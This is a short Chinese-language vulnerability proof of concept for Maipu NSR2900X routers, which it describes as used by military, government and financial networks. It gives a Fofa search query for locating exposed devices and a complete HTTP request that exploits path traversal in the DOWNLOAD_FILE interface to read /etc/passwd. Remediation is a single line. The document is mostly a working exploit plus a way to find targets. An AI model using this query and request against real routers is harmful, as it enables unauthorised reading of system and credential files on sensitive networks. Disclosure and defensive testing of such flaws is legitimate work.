0x01 产品描述:
迈普NSR2900X系列是一款专为军队、政府、金融、中小型企业分支机构和中小型企业总部设计的信创接入路由器。 该路由器采用国产核心元器件,基于国产操作系统运行迈普自主研发的网络操作系统及应用软件。它全面支持IPv4、IPv6、OSPF、BGP、MPLS等网络协议,具备访问控制、攻击检测、国密算法等安全特性,以及丰富的接口类型,如千兆光/电、E1/CE1、155M POS、高速串口等。NSR2900X路由器采用先进的多核转发技术,在功能、性能上已达到国内外同档次设备的水平
0x02 漏洞描述:
迈普pnsr2900x系统接口DOWNLOAD_FILE任意文件读取漏洞,可能导致敏感信息泄露、数据盗窃及其他安全风险,从而对系统和用户造成严重危害。
0x03 搜索语句:
Fofa:body="/assets/css/ui-dialog.css"&& body="/form/formUserLogin"
0x04 漏洞复现:
GET /DOWNLOAD_FILE/../../../../../../../../../../../../../../../../../../../etc/passwd HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:79.0) Gecko/20100101 Firefox/79.0
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Connection: keep-alive
0x05 修复建议:
厂商已发布补丁 请即时修复。